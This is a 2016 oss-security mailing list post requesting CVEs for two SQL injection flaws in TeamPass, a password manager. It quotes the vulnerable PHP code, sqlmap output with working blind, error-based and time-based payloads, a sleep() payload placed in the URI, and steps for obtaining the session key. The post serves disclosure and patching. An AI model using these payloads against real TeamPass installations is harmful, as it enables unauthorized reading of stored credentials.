Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [day] [month] [year] [list]
Date: Mon, 11 Jul 2016 11:14:02 +0800
From: das das <scusec2010@...il.com>
To: oss-security@...ts.openwall.com
Subject: CVE request:SQL injections in TeamPass

Hello,

I'd like to request CVE IDs for these issues. They were found in
TeamPass(www.teampass.net).
All the issues are found in TeamPass (2.1.26, 2.1.25, 2.1.24).
fixed:https://github.com/nilsteampassnet/TeamPass/commit/7bf6c63c4727a6ba9d65610e59ccbc25527a6fca

Issues detail:
#1: SQL injection vectors in sources/items.queries.php

-------------------------code_start TeamPass-2.1.26-------------------------
case "send_email":
            if ($_POST['key'] != $_SESSION['key']) {
                echo '[{"error" : "something_wrong"}]';
                break;
            } else {
                if (!empty($_POST['content'])) {
                    $content = explode(',', $_POST['content']);
                }
                // get links url
                if (empty($_SESSION['settings']['email_server_url'])) {
                    $_SESSION['settings']['email_server_url'] =
$_SESSION['settings']['cpassman_url'];
                }
                if ($_POST['cat'] == "request_access_to_author") {
                    $dataAuthor = DB::queryfirstrow("SELECT
email,login FROM ".prefix_table("users")." WHERE id= ".$content[1]);
                    $dataItem = DB::queryfirstrow("SELECT label FROM
".prefix_table("items")." WHERE id= ".$content[0]);
                    $ret = @sendEmail(
                        $LANG['email_request_access_subject'],
                        str_replace(array('#tp_item_author#',
'#tp_user#', '#tp_item#'), array(" ".addslashes($dataAuthor['login']),
addslashes($_SESSION['login']), addslashes($dataItem['label'])),
$LANG['email_request_access_mail']),
                        $dataAuthor['email']
                    );
                } elseif ($_POST['cat'] == "share_this_item") {
                    $dataItem = DB::queryfirstrow("SELECT
label,id_tree FROM ".prefix_table("items")." WHERE id=
".$_POST['id']);
                    // send email
                    $ret = @sendEmail(
                        $LANG['email_share_item_subject'],
                        str_replace(
                            array('#tp_link#', '#tp_user#', '#tp_item#'),

array($_SESSION['settings']['email_server_url'].'/index.php?page=items&group='.$dataItem['id_tree'].'&id='.$_POST['id'],
addslashes($_SESSION['login']), addslashes($dataItem['label'])),
                            $LANG['email_share_item_mail']
                        ),
                        $_POST['receipt']
                    );
                }
                echo '[{'.$ret.'}]';
            }
            break;
-------------------------code_end TeamPass-2.1.26--------------------------

In the "send_email" request, when the condition "$_POST['cat'] ==
"share_this_item"" is successful, the POST parameter "id" is unescaped
which leads to sql injection. while is checks the sessions at the
beginning of the script and needs the authority of normal user to
access to the page. To execute the SQL query,it verifies that if the
the post parameter'key' equals session['key'].We can get the key
through thisway´╝Ürefresh the page(e.g index.php?page=items), capture
the packet using tools (e.g Burp Suit), and forward the packet,then we
canget the value of session 'key' in the request body.
e.p
http://localhost:8088/code_audit/TeamPass/sources/items.queries.php
POST:
type=send_email&key=wiesu2Gae8shaeNgeengeiha2aic2ohghainia1laeyi9doh6G&cat=share_this_item&id=1*
Sqlmap payload:
sqlmap identified the following injection point(s) with a total of 406
HTTP(s) requests:
---
Parameter: id (POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY
or GROUP BY clause
    Payload: type=send_email&key=wiesu2Gae8shaeNgeengeiha2aic2ohghainia1laeyi9doh6G&cat=share_this_item&id=1
RLIKE (SELECT (CASE WHEN (7565=7565) THEN 1 ELSE 0x28 END))

    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or
GROUP BY clause (EXTRACTVALUE)
    Payload: type=send_email&key=wiesu2Gae8shaeNgeengeiha2aic2ohghainia1laeyi9doh6G&cat=share_this_item&id=1
AND EXTRACTVALUE(4196,CONCAT(0x5c,0x7162766271,(SELECT
(ELT(4196=4196,1))),0x716b706271))

    Type: AND/OR time-based blind
    Title: MySQL <= 5.0.11 AND time-based blind (heavy query)
    Payload: type=send_email&key=wiesu2Gae8shaeNgeengeiha2aic2ohghainia1laeyi9doh6G&cat=share_this_item&id=1
AND 7783=BENCHMARK(5000000,MD5(0x44794d4a))
---


#2: SQL injection vectors in
includes/libraries/Database/Meekrodb/db.class.php

-------------------------code_start TeamPass-2.1.26-------------------------
// ----- BEGIN ERROR HANDLING
    if (!$sql || $db->error) {
      if ($this->error_handler) {
        $db_error = $db->error;
        $db_errno = $db->errno;
$db->query(
"INSERT INTO ".$GLOBALS['pre']."log_system SET
date=".time().",
qui=".$_SESSION['user_id'].",
label='Query: ".addslashes($sql)."<br />Error:
".addslashes($db_error)."<br />@ ".$_SERVER['REQUEST_URI']."',
type='error'",
MYSQLI_USE_RESULT
);
-------------------------code_end TeamPass-2.1.26--------------------------
When a database error occurs, these codes above will be excuted.
However, the variable "$_SERVER['REQUEST_URI']" is unescaped and
controled by us which lead to a sql injection. First we need to find a
place where database error occurs, such as
"sources/import.queries.php". It needs a normal user authority to
access to the page. Then use the burpsuit to access the page to avoid
the urlencode by browsers.
e.p
http://localhost:8088/TeamPass/sources/import.queries.php?'or/**/sleep(5)/**/or'1
POST:
type=import_items&data=&folder=1
And the sql log is as below. It is a time-based sql injection.
-------------------------log_start-------------------------
Query INSERT INTO teampass_log_system SET
date=1466674179,
qui=10000001,
label='Query: INSERT INTO `teampass_items`
(`label`,`description`,`pw`,`pw_iv`,`url`,`id_tree`,`login`,`anyone_can_modify`)
VALUES (\'\', NULL, \'\', \'dfd7c5279cdd697c08b627aeaaf15999\', NULL,
\'1\', NULL, 0)<br />Error: Column \'description\' cannot be null<br
/>@ /code_audit/TeamPass/sources/import.queries.php?'or/**/sleep(5)/**/or'1',
type='error'
-------------------------log_end---------------------------


These issues were discovered by wps2015[D.A.S] of Information Security
Institute @ Sichuan University.

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ